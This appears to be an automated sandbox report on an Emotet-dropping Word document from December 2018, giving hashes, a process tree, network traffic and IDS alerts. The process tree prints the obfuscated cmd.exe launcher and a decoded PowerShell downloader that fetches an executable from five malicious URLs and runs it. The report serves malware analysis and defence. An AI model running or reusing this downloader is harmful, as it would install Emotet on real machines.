File name: | eForm-3296228.doc |
Full analysis: | https://app.any.run/tasks/e9abdf5a-a04b-4839-9eb3-66598287484c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | December 14, 2018, 18:51:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 15:02:00 2018, Last Saved Time/Date: Fri Dec 14 15:02:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 23, Security: 0 |
MD5: | 22237B0E98A7B1F1859846440A4AC104 |
SHA1: | 8B6FB2795EBA2769C21D1EEA77FC3DC923275F48 |
SHA256: | 07A0B1C66FABE2BE19366D6562C70E3A0513C31AE8C878D4D630B3847318F814 |
SSDEEP: | 1536:Locn1kp59gxBK85fBeKaKsLjmv0+K5XyZN7Q2FKH+a9:E41k/W48cKsLjmvx1NEk |
.doc | | | Microsoft Word document (54.2) |
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 15:02:00 |
ModifyDate: | 2018:12:14 15:02:00 |
Pages: | 1 |
Words: | 3 |
Characters: | 23 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 25 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\eForm-3296228.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3940 | c:\HaJKihRtkdI\pCXQqijRV\palFkcEZwNzvVU\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2464 | CmD /V/C"set x8R=AiZvijIvzLVwTnkaCIvOJdVVFFPUPojABdnszet6cf,bh.ym42}8R;Yf7f81a39-5f63-5b42-9efd-1f13b5431005#39;guKW:+N7D/X- =QxErG)09Sp@{3lH(\&&for %n in (55,59,79,54,70,56,71,11,52,56,53,55,15,9,16,70,34,37,11,68,29,43,30,37,40,38,69,63,37,38,45,60,37,43,16,84,4,37,34,38,53,55,40,11,71,70,56,44,38,38,80,61,66,66,37,18,4,44,33,15,41,45,40,29,47,66,35,46,67,72,29,32,85,33,67,81,44,38,38,80,61,66,66,80,4,34,57,11,37,74,35,37,34,45,40,29,47,66,4,2,12,23,84,37,78,41,54,81,44,38,38,80,61,66,66,4,43,57,33,45,29,74,57,66,18,83,58,12,58,73,83,81,44,38,38,80,61,66,66,38,37,18,37,38,29,57,84,58,46,37,47,37,14,45,40,29,47,45,38,74,66,35,18,34,14,32,85,49,63,81,44,38,38,80,61,66,66,4,34,11,15,45,34,37,38,66,74,27,75,44,31,18,39,30,16,56,45,79,80,84,4,38,86,56,81,56,76,53,55,85,17,12,70,56,4,79,16,56,53,55,44,28,84,69,70,69,56,64,48,78,56,53,55,17,43,63,70,56,4,27,19,56,53,55,35,43,15,70,55,37,34,18,61,38,37,47,80,62,56,87,56,62,55,44,28,84,62,56,45,37,72,37,56,53,41,29,74,37,15,40,44,86,55,30,14,19,69,4,34,69,55,40,11,71,76,82,38,74,46,82,55,15,9,16,45,65,29,11,34,84,29,15,33,25,4,84,37,86,55,30,14,19,42,69,55,35,43,15,76,53,55,16,60,35,70,56,75,36,80,56,53,17,41,69,86,86,75,37,38,68,17,38,37,47,69,55,35,43,15,76,45,84,37,34,57,38,44,69,68,57,37,69,51,77,77,77,77,76,69,82,17,34,18,29,14,37,68,17,38,37,47,69,55,35,43,15,53,55,32,58,85,70,56,40,30,41,56,53,43,74,37,15,14,53,50,50,40,15,38,40,44,82,50,50,55,16,23,54,70,56,75,30,2,56,53,89)do set dPL=!dPL!!x8R:~%n,1!&&if %n geq 89 echo !dPL:~5!|FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^^^|findstr Cons')DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | C:\Windows\system32\cmd.exe /S /D /c" echo $KSY='QwR';$aLC=new-object Net.WebClient;$cwQ='http://evihdaf.com/syXxoBHdX@http://pingwersen.com/iZTVle9fY@http://ibgd.org/v3uTuE3@http://tevetogluyemek.com.tr/svnkBH2N@http://inwa.net/rUGhAv6jC'.Split('@');$HIT='iSC';$hPl = '749';$IbN='iUO';$sba=$env:temp+'\'+$hPl+'.exe';foreach($jkO in $cwQ){try{$aLC.DownloadFile($jkO, $sba);$CWs='Gzp';If ((Get-Item $sba).length -ge 80000) {Invoke-Item $sba;$BuH='cjf';break;}}catch{}}$CVY='GjZ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2696 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.\4BY tokens=9" %Q IN ('ftype^|findstr Cons') DO %Q -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3084 | C:\Windows\system32\cmd.exe /c ftype|findstr Cons | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3348 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3432 | findstr Cons | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1952 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3060 | "C:\Users\admin\AppData\Local\Temp\749.exe" | C:\Users\admin\AppData\Local\Temp\749.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4CF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\649517C.wmf | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76E8C0EA.wmf | — | |
MD5:— | SHA256:— | |||
1952 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MX78M1AD3YBB0ZXVAVNG.temp | — | |
MD5:— | SHA256:— | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\eForm-3296228.doc.LNK | lnk | |
MD5:B7E2BB7020433E47404EEDF108694AC3 | SHA256:C94C64DD2F4FD7051783EABB57D7250A38984420E57A1289A1A686DB02361177 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\600DFBA7.wmf | wmf | |
MD5:31ED22CAFB1ED5B9C922BDD3100C4E75 | SHA256:083314353C29E0216B08EA931F26633C6C2B7DE4E81976281053E80FA75D0BB2 | |||
3516 | WINWORD.EXE | C:\Users\admin\Downloads\~$orm-3296228.doc | pgc | |
MD5:AD5ED39EF6819771966B8454FC5E0E23 | SHA256:11369E3A884256A8151E0AC75EB0A370448E8560392B554C852B67660F747592 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3 | SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4 | |||
3516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:8732908DA98065B118519D939A5A2D24 | SHA256:4B38EC23F70336F256063D551A3207CCB2DC95F48AA2DC5BAD906907B937B479 | |||
1952 | powershell.exe | C:\Users\admin\AppData\Local\Temp\749.exe | executable | |
MD5:27F7FDA215F8DE9528A480C61773A454 | SHA256:A30ED24D117AB71B256DBE9CB8EE56491E13282F050A3F8B44810DA9DCED9981 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | archivesymbol.exe | GET | — | 190.146.201.54:80 | http://190.146.201.54/ | CO | — | — | malicious |
2396 | archivesymbol.exe | GET | 200 | 190.146.201.54:80 | http://190.146.201.54/ | CO | binary | 104 Kb | malicious |
1952 | powershell.exe | GET | 301 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX | US | html | 237 b | malicious |
1952 | powershell.exe | GET | 200 | 162.220.162.40:80 | http://evihdaf.com/syXxoBHdX/ | US | executable | 156 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1952 | powershell.exe | 162.220.162.40:80 | evihdaf.com | NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC | US | malicious |
2396 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
2244 | archivesymbol.exe | 190.146.201.54:80 | — | Telmex Colombia S.A. | CO | malicious |
Domain | IP | Reputation |
---|---|---|
evihdaf.com | — | malicious |
PID | Process | Class | Message |
---|---|---|---|
1952 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
1952 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
1952 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1952 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1952 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2396 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2396 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2244 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2244 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |